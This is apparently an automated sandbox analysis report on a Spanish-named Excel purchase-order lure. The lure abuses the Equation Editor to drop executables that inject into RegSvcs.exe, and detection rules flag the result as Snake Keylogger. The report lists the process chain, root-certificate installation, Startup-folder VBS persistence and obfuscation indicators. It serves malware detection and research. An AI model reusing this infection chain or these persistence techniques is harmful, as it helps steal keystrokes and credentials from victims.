Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@13/16@20/4

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_010637B5 GetLastError,FormatMessageW,

8_2_010637B5

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010510BF AdjustTokenPrivileges,CloseHandle,	8_2_010510BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	8_2_010516C3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013910BF AdjustTokenPrivileges,CloseHandle,	11_2_013910BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_013916C3

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_010651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_010651CD

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_00B9A67C

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

5_2_00B8648E

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

5_2_00B142A2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR71F4.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Orden de compra 0001-00255454.xlam.xlsx	Virustotal: Detection: 55%
Source: Orden de compra 0001-00255454.xlam.xlsx	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Orden de compra 0001-00255454.xlam.xlsx

Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Source: Orden de compra 0001-00255454.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EFE76 push ecx; ret	5_3_029EFE89
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B30A76 push ecx; ret	5_2_00B30A89
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01010A76 push ecx; ret	8_2_01010A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C40C push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C50E push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E21D push ecx; ret	9_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C6BE push ebx; ret	9_2_0041C6BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01350A76 push ecx; ret	11_2_01350A89

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Roaming\negrett.exe	File created: C:\Users\user\AppData\Local\directory\name.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\negrett.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	8_2_0100F98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01081C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	8_2_01081C41
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	11_2_0134F98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	11_2_013C1C41

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
